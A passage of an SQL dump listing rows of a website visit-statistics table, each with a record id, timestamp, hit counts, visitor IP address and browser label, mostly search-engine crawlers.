0','other'),(458329,1572230362,1,1,0,0,'213.180.203.44','other'),(458330,1572230405,1,1,0,0,'8.29.198.27','other'),(458331,1572230519,1,1,0,0,'207.46.13.200','other'),(458332,1572230934,1,1,0,0,'8.29.198.26','other'),(458333,1572231295,1,1,0,0,'66.249.64.27','chrome'),(458334,1572231399,1,1,0,0,'66.249.64.28','chrome'),(458335,1572231455,1,1,0,0,'213.180.203.37','other'),(458336,1572233228,2,2,0,0,'66.249.64.28','chrome'),(458337,1572234252,1,1,0,0,'213.180.203.37','other'),(458338,1572234256,1,1,0,0,'213.180.203.44','other'),(458339,1572234776,1,1,0,0,'157.55.39.193','other'),(458340,1572235942,1,1,0,0,'66.249.64.28','chrome'),(458341,1572237818,1,1,0,0,'91.196.178.189','chrome'),(458342,1572237910,1,1,0,0,'213.180.203.44','other'),(458343,1572237953,1,1,0,0,'157.55.39.193','other'),(458344,1572238740,1,1,0,0,'66.249.64.27','chrome'),(458345,1572240442,1,1,0,0,'213.180.203.44','other'),(458346,1572240588,1,1,0,0,'66.249.64.26','chrome'),(458347,1572241245,1,1,0,0,'8.29.198.26','other'),(458348,1572241587,1,1,0,0,'66.249.64.26','chrome'),(458349,1572241775,1,1,0,0,'8.29.198.27','other'),(458350,1572242687,1,1,0,0,'66.249.64.26','chrome'),(458351,1572243111,1,1,0,0,'66.249.70.33','chrome'),(458352,1572244768,1,1,0,0,'66.249.64.26','chrome'),(458353,1572245565,1,1,0,0,'66.249.64.28','chrome'),(458354,1572245569,1,1,0,0,'66.249.64.27','chrome'),(458355,1572246011,1,1,0,0,'213.180.203.44','other'),(458356,1572246412,1,1,0,0,'91.196.177.46','chrome'),(458357,1572247143,2,2,0,0,'66.249.64.27','chrome'),(458358,1572247152,3,3,0,0,'66.249.64.26','chrome'),(458359,1572247411,1,1,0,0,'66.249.64.28','chrome'),(458360,1572248274,1,1,0,0,'66.249.66.132','chrome'),(458361,1572248619,1,1,0,0,'157.55.39.252','other'),(458362,1572248929,1,1,0,0,'66.249.64.28','chrome'),(458363,1572249588,1,1,0,0,'157.55.39.252','other'),(458364,1572249773,1,1,0,0,'13.66.139.0','other'),(458365,1572250755,1,1,0,0,'213.180.203.37','other'),(458366,1572251019,1,1,0,0,'213.180.203.44','other'),(458367,1572251198,1,1,0,0,'95.134.203.155','chrome'),(458368,1572251210,1,1,0,0,'141.8.142.2','other'),(458369,1572251295,3,3,0,0,'66.249.64.28','chrome'),(458370,1572251735,3,3,0,0,'66.249.64.26','chrome'),(458371,1572251982,1,1,0,0,'157.55.39.108','other'),(458372,1572252083,1,1,0,0,'8.29.198.26','other'),(458373,1572252101,1,1,0,0,'66.249.64.27','chrome'),(458374,1572252133,1,1,0,0,'91.196.178.72','chrome'),(458375,1572252201,1,1,0,0,'66.249.64.28','chrome'),(458376,1572252641,1,1,0,0,'8.29.198.25','other'),(458377,1572253582,1,1,0,0,'213.180.203.44','other'),(458378,1572253768,1,1,0,0,'66.249.64.27','chrome'),(458379,1572253950,1,1,0,0,'66.249.64.28','chrome'),(458380,1572254038,2,2,0,0,'157.55.39.108','other'),(458381,1572254100,1,1,0,0,'66.249.70.36','chrome'),(458382,1572254928,1,1,0,0,'207.46.13.110','other'),(458383,1572255152,1,1,0,0,'213.180.203.44','other'),(458384,1572255216,2,2,0,0,'66.249.64.26','chrome'),(458385,1572255218,1,1,0,0,'66.249.64.28','chrome'),(458386,1572255329,1,1,0,0,'91.196.178.75','firefox'),(458387,1572255465,1,1,0,0,'66.249.64.27','chrome'),(458388,1572255488,1,1,0,0,'128.71.125.90','chrome'),(458389,1572256271,1,1,0,0,'213.180.203.37','other'),(458390,1572256581,1,1,0,0,'66.249.64.26','chrome'),(458391,1572257103,1,1,0,0,'66.249.64.28','chrome'),(458392,1572258056,2,2,0,0,'66.249.64.28','chrome'),(458393,1572258401,2,2,0,0,'66.249.64.26','chrome'),(458394,1572259010,1,1,0,0,'213.180.203.44','other'),(458395,1572259150,1,1,0,0,'141.8.142.2','other'),(458396,1572259270,1,1,0,0,'66.249.64.27','chrome'),(458397,1572259302,2,2,0,0,'66.249.64.26','chrome'),(458398,1572259843,2,2,0,0,'157.55.39.11','other'),(458399,1572260052,1,1,0,0,'77.222.143.222','msie'),(458400,1572260310,1,1,0,0,'37.9.113.10','other'),(458401,1572260403,4,4,0,0,'157.55.39.108','other'),(458402,1572260407,1,1,0,0,'207.46.13.110','other'),(458403,1572260517,3,3,0,0,'66.249.64.26','chrome'),(458404,1572260733,1,1,0,0,'66.249.64.27','chrome'),(458405,1572260792,1,1,0,0,'213.180.203.44','other'),(458406,1572262067,1,1,0,0,'157.55.39.108','other'),(458407,1572262398,1,1,0,0,'66.249.70.62','chrome'),(458408,1572262618,1,1,0,0,'66.249.64.28','chrome'),(458409,1572262941,1,1,0,0,'8.29.198.25','other'),(458410,1572263374,2,2,0,0,'213.180.203.44','other'),(458411,1572263500,1,1,0,0,'8.29.198.27','other'),(458412,1572263798,1,1,0,0,'66.249.64.27','chrome'),(458413,1572265032,1,1,0,0,'66.249.64.27','chrome'),(458414,1572266198,3,3,0,0,'157.55.39.11','other'),(458415,1572266297,1,1,0,0,'66.249.64.28','chrome'),(458416,1572266395,1,1,0,0,'66.249.64.26','chrome'),(458417,1572266968,1,1,0,0,'141.8.188.25','other'),(458418,1572266978,1,1,0,0,'66.249.64.27','chrome'),(458419,1572267145,1,1,0,0,'141.8.142.164','other'),(458420,1572267373,1,1,0,0,'95.134.203.155','chrome'),(458421,1572267956,1,1,0,0,'157.55.39.108','other'),(458422,1572268020,1,1,0,0,'66.249.64.28','chrome'),(458423,1572268277,1,1,0,0,'66.249.64.26','chrome'),(458424,1572268427,1,1,0,0,'66.249.64.27','chrome'),(458425,1572269157,1,1,0,0,'38.125.234.53','chrome'),(458426,1572269177,1,1,0,0,'45.61.173.113','chrome'),(458427,1572269478,1,1,0,0,'66.249.64.27','chrome'),(458428,1572269762,1,1,0,0,'91.196.178.72','chrome'),(458429,1572270088,1,1,0,0,'109.74.154.72','chrome'),(458430,1572270593,2,2,0,0,'66.249.64.27','chrome'),(458431,1572270718,2,2,0,0,'157.55.39.108','other'),(458432,1572271191,1,1,0,0,'66.249.64.26','chrome'),(458433,1572271416,1,1,0,0,'37.53.230.169','chrome'),(458434,1572271454,1,1,0,0,'91.196.178.73','firefox'),(458435,1572271554,1,1,0,0,'91.196.178.72','chrome'),(458436,1572272112,1,1,0,0,'213.180.203.44','other'),(458437,1572273388,1,1,0,0,'91.196.178.89','firefox'),(458438,1572273785,1,1,0,0,'8.29.198.27','other'),(458439,1572274153,1,1,0,0,'77.222.143.222','msie'),(458440,1572274343,1,1,0,0,'8.29.198.26','other'),(458441,1572274801,1,1,0,0,'213.180.203.44','other'),(458442,1572276403,1,1,0,0,'66.249.64.26','chrome'),(458443,1572277211,1,1,0,0,'213.180.203.37','other'),(458444,1572277357,1,1,0,0,'66.249.64.28','chrome'),(458445,1572277709,1,1,0,0,'66.249.64.26','chrome'),(458446,1572278069,1,1,0,0,'37.204.75.202','msie'),(458447,1572278072,1,1,0,0,'95.24.25.199','msie'),(458448,1572278519,1,1,0,0,'213.180.203.37','other'),(458449,1572278522,1,1,0,0,'66.249.89.26','other'),(458450,1572278525,1,1,0,0,'66.249.89.28','other'),(458451,1572278528,1,1,0,0,'74.125.151.46','other'),(458452,1572278935,1,1,0,0,'66.249.64.26','chrome'),(458453,1572279139,1,1,0,0,'213.180.203.44','other'),(458454,1572279618,1,1,0,0,'66.249.64.27','chrome'),(458455,1572281018,1,1,0,0,'213.180.203.37','other'),(458456,1572282301,1,1,0,0,'213.180.203.44','other'),(458457,1572282349,1,1,0,0,'66.249.64.27','chrome'),(458458,1572283135,1,1,0,0,'51.158.161.141','firefox'),(458459,1572283145,1,1,0,0,'91.196.178.61','chrome'),(458460,1572284629,1,1,0,0,'8.29.198.27','other'),(458461,1572285179,1,1,0,0,'8.29.198.25','other'),(458462,1572286408,2,2,0,0,'157.55.39.220','other'),(458463,1572287335,1,1,0,0,'178.154.200.33','other'),(458464,1572287343,1,1,0,0,'93.124.66.67','chrome'),(458465,1572288628,1,1,0,0,'213.180.203.37','other'),(458466,1572289497,1,1,0,0,'157.55.39.220','other'),(458467,1572290522,1,1,0,0,'101.50.93.99','chrome'),(458468,1572291603,1,1,0,0,'66.249.64.26','chrome'),(458469,1572291850,2,2,0,0,'60.191.38.77','firefox'),(458470,1572293610,2,2,0,0,'95.213.141.126','opera'),(458471,1572294780,4,4,0,0,'178.92.133.221','other'),(458473,1572295465,2,2,0,0,'8.29.198.27','other'),(458474,1572296129,2,2,0,0,'207.46.13.97','other'),(458475,1572297225,1,1,0,0,'66.249.64.26','chrome'),(458476,1572297559,2,2,0,0,'157.55.39.220','other'),(458477,1572298626,1,1,0,0,'31.13.127.12','other'),(458479,1572298627,1,1,0,0,'31.13.127.5','other'),(458481,1572299336,2,2,0,0,'157.55.39.220','other'),(458482,1572302130,1,1,0,0,'157.55.39.220','other'),(458483,1572303260,1,1,0,0,'34.67.64.119','other'),(458484,1572303505,1,1,0,0,'207.46.13.250','other'),(458485,1572304225,1,1,0,0,'157.55.39.163','other'),(458486,1572305852,1,1,0,0,'83.102.163.73','msie'),(458487,1572305969,1,1,0,0,'66.249.64.28','chrome'),(458488,1572306307,2,2,0,0,'8.29.198.25','other'),(458489,1572307018,1,1,0,0,'213.180.203.44','other'),(458490,1572308121,1,1,0,0,'66.249.64.26','chrome'),(458491,1572308301,7,7,0,0,'34.67.64.119','other'),(458492,1572308352,1,1,0,0,'207.46.13.214','other'),(458493,1572309401,1,1,0,0,'66.249.70.62','chrome'),(458494,1572311029,1,1,0,0,'66.249.64.26','chrome'),(458495,1572314745,2,2,0,0,'66.249.64.28','chrome'),(458496,1572315316,2,2,0,0,'66.249.64.27','chrome'),(458497,1572315395,1,1,0,0,'95.216.96.245','other'),(458498,1572315838,1,1,0,0,'66.249.70.33','chrome'),(458499,1572317163,1,1,0,0,'8.29.198.27','other'),(458500,1572317705,1,1,0,0,'8.29.198.26','other'),(458501,1572318211,1,1,0,0,'37.9.113.33','other'),(458502,1572319251,2,2,0,0,'207.46.13.213','other'),(458503,1572319572,1,1,0,0,'207.46.13.214','other'),(458504,1572319623,1,1,0,0,'66.249.64.27','chrome'),(458505,1572321642,2,2,0,0,'66.249.64.26','chrome'),(458506,1572321802,1,1,0,0,'66.249.64.27','chrome'),(458507,1572321950,1,1,0,0,'207.46.13.214','other'),(458508,1572322599,1,1,0,0,'213.180.203.44','other'),(458509,1572322669,1,1,0,0,'46.211.145.66','chrome'),(458510,1572324368,1,1,0,0,'207.46.13.220','other'),(458511,1572324925,1,1,0,0,'213.180.203.37','other'),(458512,1572325334,1,1,0,0,'66.249.64.28','chrome'),(458513,1572326406,1,1,0,0,'213.180.203.44','other'),(458514,1572327108,1,1,0,0,'91.196.178.70','chrome'),(458515,1572327337,1,1,0,0,'91.196.178.136','firefox'),(458516,1572328011,1,1,0,0,'8.29.198.26','other'),(458517,1572328563,1,1,0,0,'8.29.198.25','other'),(458518,1572328848,1,1,0,0,'193.106.30.99','chrome'),(458519,1572329928,1,1,0,0,'52.162.161.148','other'),(458520,1572333586,1,1,0,0,'213.180.203.44','other'),(458521,1572334329,1,1,0,0,'37.53.226.125','chrome'),(458522,1572334374,1,1,0,0,'91.196.177.46','chrome'),(458523,1572334707,1,1,0,0,'213.180.203.37','other'),(458524,1572335922,1,1,0,0,'91.196.178.99','chrome'),(458525,1572337269,1,1,0,0,'95.132.4.226','chrome'),(458526,1572337504,1,1,0,0,'66.249.64.28','chrome'),(458527,1572338854,1,1,0,0,'8.29.198.26','other'),(458528,1572339036,1,1,0,0,'91.196.178.70','firefox'),(458529,1572339404,1,1,0,0,'8.29.198.27','other'),(458530,1572339899,1,1,0,0,'91.196.178.88','chrome'),(458531,1572340004,1,1,0,0,'142.93.137.184','firefox'),(458532,1572340970,1,1,0,0,'91.209.11.236','other'),(458533,1572341511,1,1,0,0,'91.196.179.138','chrome'),(458534,1572341849,1,1,0,0,'213.180.203.44','other'),(458535,1572342939,1,1,0,0,'51.89.171.245','chrome'),(458536,1572343155,1,1,0,0,'213.180.203.37','other'),(458537,1572346514,1,0,1,0,'51.83.19.253',''),(458538,1572346799,1,1,0,0,'213.180.203.44','other'),(458539,1572348064,1,1,0,0,'213.180.203.37','other'),(458540,1572349714,2,2,0,0,'8.29.198.27','other'),(458541,1572352498,2,2,0,0,'157.55.39.151','other'),(458542,1572353279,1,1,0,0,'207.46.13.229','other'),(458543,1572353630,1,1,0,0,'157.55.39.252','other'),(458544,1572353995,1,1,0,0,'91.196.178.88','chrome'),(458545,1572354365,1,1,0,0,'141.8.142.2','other'),(458546,1572354396,1,1,0,0,'207.46.13.14','other'),(458547,1572355753,1,1,0,0,'157.55.39.140','other'),(458548,1572357790,1,1,0,0,'157.55.39.139','other'),(458549,1572358613,1,1,0,0,'109.74.154.72','chrome'),(458550,1572360070,1,1,0,0,'207.46.13.70','other'),(458551,1572360593,1,1,0,0,'8.29.198.26','other'),(458552,1572360742,1,1,0,0,'91.196.179.33','chrome'),(458553,1572361139,1,1,0,0,'8.29.198.25','other'),(458554,1572362169,1,1,0,0,'157.55.39.139','other'),(458555,1572364540,1,1,0,0,'213.180.203.37','other'),(458556,1572365722,1,1,0,0,'178.154.200.33','other'),(458557,1572366332,1,1,0,0,'207.46.13.70','other'),(458558,1572367021,1,1,0,0,'91.196.178.71','firefox'),(458559,1572369634,1,1,0,0,'46.211.153.88','chrome'),(458560,1572370180,1,1,0,0,'213.180.203.37','other'),(458561,1572370930,1,1,0,0,'213.180.203.44','other'),(458562,1572371349,1,1,0,0,'209.17.96.130','other'),(458563,1572371447,1,1,0,0,'8.29.198.26','other'),(458564,1572371983,1,1,0,0,'8.29.198.25','other'),(458565,1572372262,1,1,0,0,'37.9.113.10','other'),(458566,1572376681,1,1,0,0,'213.159.213.236','chrome'),(458567,1572378015,1,1,0,0,'212.115.244.72','firefox'),(458568,1572378129,1,1,0,0,'207.46.13.6','other'),(458569,1572380404,1,1,0,0,'207.46.13.4','other'),(458570,1572380436,1,1,0,0,'207.46.13.151','other'),(458571,1572380644,1,1,0,0,'213.180.203.44','other'),(458572,1572382294,1,1,0,0,'8.29.198.25','other'),(458573,1572382838,1,1,0,0,'8.29.198.26','other'),(458574,1572383435,1,1,0,0,'66.249.64.27','chrome'),(458575,1572383592,1,1,0,0,'31.13.127.24','other'),(458576,1572383593,1,1,0,0,'31.13.127.16','other'),(458577,1572385141,1,1,0,0,'209.17.96.154','other'),(458578,1572385193,1,1,0,0,'141.8.132.19','other'),(458579,1572385917,1,1,0,0,'66.249.64.28','chrome'),(458580,1572386096,1,1,0,0,'207.46.13.6','other'),(458581,1572386241,2,2,0,0,'66.249.64.26','chrome'),(458582,1572386533,1,1,0,0,'66.249.64.27','chrome'),(458583,1572388279,1,1,0,0,'193.106.30.99','chrome'),(458584,1572389073,1,1,0,0,'23.227.192.58','chrome'),(458585,1572389362,1,1,0,0,'13.66.139.0','other'),(458586,1572390697,1,1,0,0,'66.249.64.27','chrome'),(458587,1572391183,1,1,0,0,'213.180.203.44','other'),(458588,1572393146,1,1,0,0,'8.29.198.26','other'),(458589,1572393673,1,1,0,0,'8.29.198.25','other'),(458590,1572395396,1,1,0,0,'91.209.11.236','other'),(458591,1572396185,1,1,0,0,'213.180.203.44','other'),(458592,1572397509,1,1,0,0,'157.55.39.238','other'),(458593,1572398799,1,1,0,0,'213.180.203.37','other'),(458594,1572401403,1,1,0,0,'207.46.13.222','other'),(458595,1572401491,1,1,0,0,'157.55.39.238','other'),(458596,1572402264,1,1,0,0,'178.154.200.71','other'),(458597,1572402582,1,1,0,0,'51.158.126.165','chrome'),(458598,1572402708,1,1,0,0,'207.46.13.222','other'),(458599,1572402878,1,1,0,0,'176.119.99.15','chrome'),(458600,1572403497,1,1,0,0,'141.8.132.19','other'),(458601,1572403987,1,1,0,0,'8.29.198.26','other'),(458602,1572404519,1,1,0,0,'8.29.198.27','other'),(458603,1572404818,1,1,0,0,'128.124.133.234','chrome'),(458604,1572404856,1,1,0,0,'141.8.183.15','other'),(458605,1572405854,1,1,0,0,'207.46.13.81','other'),(458606,1572407283,1,1,0,0,'141.8.132.37','other'),(458607,1572407448,1,1,0,0,'141.8.142.2','other'),(458608,1572408878,1,1,0,0,'157.55.39.199','other'),(458609,1572410032,1,1,0,0,'66.249.64.28','chrome'),(458610,1572413591,1,1,0,0,'197.46.5.73','chrome'),(458611,1572414660,1,1,0,0,'213.180.203.37','other'),(458612,1572414839,1,1,0,0,'8.29.198.27','other'),(458613,1572415360,1,1,0,0,'8.29.198.26','other'),(458614,1572416868,1,1,0,0,'91.196.177.46','firefox'),(458615,1572416897,1,1,0,0,'141.8.132.12','other'),(458616,1572417279,1,1,0,0,'141.8.188.20','other'),(458617,1572418254,1,1,0,0,'52.162.161.148','other'),(458618,1572418361,1,1,0,0,'91.196.179.33','firefox'),(458619,1572418934,1,1,0,0,'91.196.177.46','chrome'),(458620,1572419142,1,1,0,0,'91.196.178.177','chrome'),(458621,1572419304,1,1,0,0,'157.55.39.199','other'),(458622,1572421468,1,1,0,0,'91.196.178.79','chrome'),(458623,1572423073,1,1,0,0,'91.196.178.72','firefox'),(458624,1572423703,1,1,0,0,'66.249.64.28','chrome'),(458625,1572424729,1,1,0,0,'5.58.53.161','other'),(458626,1572424783,1,1,0,0,'66.249.64.28','chrome'),(458627,1572425687,1,1,0,0,'8.29.198.26','other'),(458628,1572426023,1,1,0,0,'91.196.178.72','firefox'),(458629,1572426235,1,1,0,0,'207.46.13.138','other'),(458630,1572426245,1,1,0,0,'8.29.198.25','other'),(458631,1572426731,1,1,0,0,'91.196.178.88','chrome'),(458632,1572426787,1,1,0,0,'91.196.179.138','chrome'),(458633,1572427707,2,2,0,0,'91.196.178.72','firefox'),(458634,1572428096,1,1,0,0,'207.46.13.107','other'),(458635,1572428836,1,1,0,0,'91.196.178.175','chrome'),(458636,1572429962,1,1,0,0,'37.186.130.54','firefox'),(458637,1572431350,1,1,0,0,'66.249.64.27','chrome'),(458638,1572432381,2,2,0,0,'95.213.141.126','opera'),(458639,1572433955,1,1,0,0,'77.222.143.222','msie'),(458640,1572434240,1,1,0,0,'157.55.39.70','other'),(458641,1572434247,1,1,0,0,'66.249.64.26','chrome'),(458642,1572435086,1,1,0,0,'37.9.113.6','other'),(458643,1572435170,1,1,0,0,'207.46.13.123','other'),(458644,1572435676,2,2,0,0,'193.202.118.164','chrome'),(458645,1572436140,1,1,0,0,'66.249.64.18','chrome'),(458646,1572436552,1,1,0,0,'8.29.198.26','other'),(458647,1572437063,1,1,0,0,'212.90.45.139','firefox'),(458648,1572437092,1,1,0,0,'8.29.198.27','other'),(458649,1572439019,1,1,0,0,'207.46.13.123','other'),(458650,1572439757,1,1,0,0,'157.55.39.121','other'),(458651,1572440097,1,1,0,0,'141.8.183.33','other'),(458652,1572440212,1,1,0,0,'207.46.13.123','other'),(458653,1572440495,1,1,0,0,'109.74.154.72','chrome'),(458654,1572440800,1,1,0,0,'91.196.178.88','chrome'),(458655,1572441292,1,1,0,0,'87.250.224.104','other'),(458656,1572441575,1,1,0,0,'207.46.13.163','other'),(458657,1572442235,1,1,0,0,'207.46.13.213','other'),(458658,1572442403,1,1,0,0,'157.55.39.94','other'),(458659,1572442578,1,1,0,0,'207.46.13.163','other'),(458660,1572442896,1,1,0,0,'91.196.177.46','firefox'),(458661,1572444642,1,1,0,0,'91.196.178.88','chrome'),(458662,1572444878,1,1,0,0,'31.13.127.28','other'),(458663,1572444886,1,1,0,0,'31.13.115.4','other'),(458664,1572444887,1,1,0,0,'31.13.127.11','other'),(458668,1572444888,1,1,0,0,'66.220.149.47','other'),(458669,1572444909,3,3,0,0,'31.13.127.27','other'),(458670,1572444910,2,2,0,0,'31.13.127.20','other'),(458672,1572444911,1,1,0,0,'31.13.127.6','other'),(458674,1572444929,1,1,0,0,'31.13.127.14','other'),(458675,1572444930,1,1,0,0,'31.13.127.24','other'),(458676,1572444931,1,1,0,0,'31.13.127.23','other'),(458678,1572445153,1,1,0,0,'37.73.175.220','chrome'),(458679,1572445257,1,1,0,0,'82.207.116.16','other'),(458680,1572445649,1,1,0,0,'31.13.127.30','other'),(458681,1572445650,1,1,0,0,'31.13.127.13','other'),(458682,1572445824,1,1,0,0,'69.171.251.41','other'),(458683,1572446000,1,1,0,0,'66.249.70.36','chrome'),(458684,1572446085,3,3,0,0,'31.13.127.2','other'),(458685,1572446086,1,1,0,0,'31.13.127.20','other'),(458687,1572446090,1,1,0,0,'31.13.127.6','other'),(458690,1572446103,1,1,0,0,'31.13.127.27','other'),(458693,1572446104,1,1,0,0,'31.13.127.9','other'),(458694,1572446245,1,1,0,0,'91.196.178.129','firefox'),(458695,1572446265,1,1,0,0,'91.196.177.46','chrome'),(458696,1572446747,1,1,0,0,'91.196.178.88','chrome'),(458697,1572446872,1,1,0,0,'207.46.13.116','other'),(458698,1572447423,1,1,0,0,'8.29.198.26','other'),(458699,1572447751,1,1,0,0,'66.249.64.26','chrome'),(458700,1572447971,1,1,0,0,'8.29.198.27','other'),(458701,1572448529,1,1,0,0,'51.68.152.26','chrome'),(458702,1572449656,1,1,0,0,'46.211.155.144','chrome'),(458703,1572449890,1,1,0,0,'157.55.39.94','other'),(458704,1572450536,2,2,0,0,'66.249.64.28','chrome'),(458705,1572450950,1,1,0,0,'66.249.70.62','chrome'),(458706,1572451213,1,1,0,0,'66.249.64.27','chrome'),(458707,1572452362,2,2,0,0,'66.249.64.27','chrome'),(458708,1572452530,2,2,0,0,'66.249.70.36','chrome'),(458709,1572452906,1,1,0,0,'66.249.64.26','chrome'),(458710,1572452991,1,1,0,0,'46.211.246.219','chrome'),(458711,1572453118,1,1,0,0,'66.249.64.28','chrome'),(458712,1572453396,2,2,0,0,'66.249.64.27','chrome'),(458713,1572453461,1,1,0,0,'207.46.13.116','other'),(458714,1572453484,1,1,0,0,'91.196.178.103','chrome'),(458715,1572454130,1,1,0,0,'66.249.64.26','chrome'),(458716,1572454205,1,1,0,0,'66.249.70.33','chrome'),(458717,1572455120,1,1,0,0,'207.46.13.116','other'),(458718,1572455560,1,1,0,0,'66.249.64.28','chrome'),(458719,1572455597,2,2,0,0,'66.249.64.26','chrome'),(458720,1572456915,3,3,0,0,'66.249.64.27','chrome'),(458721,1572457042,3,3,0,0,'66.249.64.26','chrome'),(458722,1572457137,1,1,0,0,'46.211.153.74','chrome'),(458723,1572458301,1,1,0,0,'91.196.178.86','firefox'),(458724,1572458309,2,2,0,0,'8.29.198.25','other'),(458725,1572459150,1,1,0,0,'77.222.143.222','msie'),(458726,1572459155,1,1,0,0,'66.249.64.27','chrome'),(458727,1572459251,1,1,0,0,'46.42.173.64','chrome'),(458728,1572460696,2,2,0,0,'66.249.64.28','chrome'),(458729,1572461996,1,1,0,0,'157.55.39.94','other'),(458730,1572461997,2,2,0,0,'178.154.200.33','other'),(458731,1572462018,1,1,0,0,'178.154.200.13','chrome'),(458732,1572462251,1,1,0,0,'31.13.127.23','other'),(458733,1572462252,1,1,0,0,'31.13.127.26','other'),(458734,1572462390,1,1,0,0,'66.249.64.27','chrome'),(458735,1572462653,2,2,0,0,'66.249.64.26','chrome'),(458736,1572462665,1,1,0,0,'141.8.142.164','other'),(458737,1572462901,1,1,0,0,'66.249.64.28','chrome'),(458738,1572463422,1,1,0,0,'37.9.113.142','other'),(458739,1572464629,1,1,0,0,'66.249.64.28','chrome'),(458740,1572464769,1,1,0,0,'207.46.13.206','other'),(458741,1572465851,1,1,0,0,'141.8.132.12','other'),(458742,1572465865,1,1,0,0,'141.8.142.115','other'),(458743,1572466561,1,1,0,0,'193.106.30.99','chrome'),(458744,1572466686,1,1,0,0,'66.249.64.28','chrome'),(458745,1572467082,1,1,0,0,'2.95.171.63','chrome'),(458746,1572467487,1,1,0,0,'5.45.207.49','other'),(458747,1572467849,1,1,0,0,'176.59.144.98','other'),(458748,1572468866,1,1,0,0,'52.162.161.148','other'),(458749,1572469174,1,1,0,0,'8.29.198.26','other'),(458750,1572469181,1,1,0,0,'104.36.16.15','chrome'),(458751,1572469698,1,1,0,0,'8.29.198.27','other'),(458752,1572471045,1,1,0,0,'66.249.64.26','chrome'),(458753,1572472023,1,1,0,0,'66.249.70.36','chrome'),(458754,1572474950,2,2,0,0,'157.55.39.212','other'),(458755,1572475165,1,1,0,0,'66.249.64.27','chrome'),(458756,1572475232,1,1,0,0,'207.46.13.105','other'),(458757,1572475339,1,1,0,0,'178.154.200.13','other'),(458758,1572475341,1,1,0,0,'5.255.253.8','other'),(458759,1572475373,1,1,0,0,'195.128.17.206','other'),(458760,1572476256,2,2,0,0,'66.249.64.26','chrome'),(458761,1572476524,1,1,0,0,'207.46.13.105','other'),(458762,1572476689,1,1,0,0,'66.249.70.36','chrome'),(458763,1572477217,1,1,0,0,'66.249.64.27','chrome'),(458764,1572477789,1,1,0,0,'207.46.13.105','other'),(458765,1572478335,8,8,0,0,'60.191.38.77','firefox'),(458766,1572478439,2,2,0,0,'66.249.64.26','chrome'),(458767,1572479299,1,1,0,0,'178.154.200.71','other'),(458768,1572479776,2,2,0,0,'31.13.115.24','other'),(458769,1572480027,1,1,0,0,'8.29.198.27','other'),(458770,1572480547,1,1,0,0,'8.29.198.25','other'),(458771,1572480998,3,3,0,0,'66.249.64.26','chrome'),(458772,1572481578,1,1,0,0,'141.8.142.132','other'),(458773,1572481964,1,1,0,0,'178.154.200.13','other'),(458774,1572481996,1,1,0,0,'207.46.13.105','other'),(458775,1572482009,1,1,0,0,'141.8.132.12','other'),(458776,1572482992,1,1,0,0,'66.249.64.26','chrome'),(458777,1572483087,1,1,0,0,'157.55.39.65','other'),(458778,1572483099,1,1,0,0,'37.9.113.10','other'),(458779,1572483388,1,1,0,0,'66.249.64.28','chrome'),(458780,1572483895,2,2,0,0,'66.249.64.27','chrome'),(458781,1572484347,2,2,0,0,'66.249.64.26','chrome'),(458782,1572484363,2,2,0,0,'207.46.13.105','other'),(458783,1572484370,1,1,0,0,'178.154.200.13','other'),(458784,1572484490,1,1,0,0,'178.154.200.27','other'),(458785,1572484569,1,1,0,0,'141.8.188.20','other'),(458786,1572485005,2,2,0,0,'66.249.70.62','chrome'),(458787,1572485849,1,1,0,0,'141.8.183.33','other'),(458788,1572485852,1,1,0,0,'66.249.64.27','chrome'),(458789,1572486269,1,1,0,0,'66.249.64.28','chrome'),(458790,1572488276,1,1,0,0,'5.9.65.70','chrome'),(458791,1572488278,1,1,0,0,'194.150.117.29','chrome'),(458792,1572489390,2,2,0,0,'66.249.64.26','chrome'),(458793,1572489439,1,1,0,0,'157.55.39.65','other'),(458794,1572489711,1,1,0,0,'66.249.64.28','chrome'),(458795,1572490105,1,1,0,0,'178.154.200.13','other'),(458796,1572490875,1,1,0,0,'8.29.198.25','other'),(458797,1572491398,1,1,0,0,'8.29.198.27','other'),(458798,1572491459,2,2,0,0,'66.249.64.27','chrome'),(458799,1572491554,1,1,0,0,'66.249.64.26','chrome'),(458800,1572492401,1,1,0,0,'66.249.64.28','chrome'),(458801,1572492457,1,1,0,0,'66.249.70.33','chrome'),(458802,1572493489,1,1,0,0,'5.45.207.49','other'),(458803,1572493702,1,1,0,0,'89.31.57.5','opera'),(458804,1572493706,1,1,0,0,'178.175.131.194','opera'),(458805,1572493833,1,1,0,0,'141.8.142.164','other'),(458806,1572494395,1,1,0,0,'66.249.64.28','chrome'),(458807,1572495166,2,2,0,0,'66.249.64.27','chrome'),(458808,1572495181,1,1,0,0,'181.215.200.17','chrome'),(458809,1572495865,1,1,0,0,'31.13.127.19','other'),(458810,1572495866,1,1,0,0,'31.13.127.1','other'),(458811,1572496741,1,1,0,0,'157.55.39.65','other'),(458812,1572498099,1,1,0,0,'157.55.39.190','other'),(458813,1572498355,2,2,0,0,'66.249.64.26','chrome'),(458814,1572498384,1,1,0,0,'157.55.39.46','other'),(458815,1572499811,1,1,0,0,'87.250.224.90','other'),(458816,1572500765,1,1,0,0,'207.46.13.51','other'),(458817,1572500993,1,1,0,0,'5.45.207.65','other'),(458818,1572501067,1,1,0,0,'141.8.142.177','other'),(458819,1572501733,2,2,0,0,'8.29.198.26','other'),(458820,1572501957,2,2,0,0,'207.46.13.51','other'),(458821,1572502152,1,1,0,0,'66.249.64.27','chrome'),(458822,1572502184,1,1,0,0,'66.249.70.33','chrome'),(458823,1572502204,1,1,0,0,'141.8.188.20','other'),(458824,1572502221,1,1,0,0,'141.8.183.15','other'),(458825,1572502225,1,1,0,0,'141.8.142.164','other'),(458826,1572502692,1,1,0,0,'157.55.39.46','other'),(458827,1572503143,2,2,0,0,'66.249.64.26','chrome'),(458828,1572503570,1,1,0,0,'141.8.142.119','other'),(458829,1572503642,1,1,0,0,'109.40.240.233','firefox'),(458830,1572503744,1,1,0,0,'157.55.39.190','other'),(458831,1572503889,1,1,0,0,'157.55.39.192','other'),(458832,1572504806,1,1,0,0,'141.8.183.33','other'),(458833,1572505326,1,1,0,0,'66.249.70.36','chrome'),(458834,1572505624,2,2,0,0,'91.196.178.88','chrome'),(458835,1572506114,1,1,0,0,'178.154.200.33','other'),(458836,1572506139,5,5,0,0,'31.13.127.24','other'),(458837,1572506140,1,1,0,0,'31.13.127.5','other'),(458842,1572506141,1,1,0,0,'31.13.127.4','other'),(458844,1572506602,1,1,0,0,'157.55.39.46','other'),(458845,1572507005,1,1,0,0,'91.196.178.87','firefox'),(458846,1572507070,1,1,0,0,'66.249.70.36','chrome'),(458847,1572507339,2,2,0,0,'66.249.64.27','chrome'),(458848,1572507923,1,1,0,0,'66.249.64.28','chrome'),(458849,1572507952,1,1,0,0,'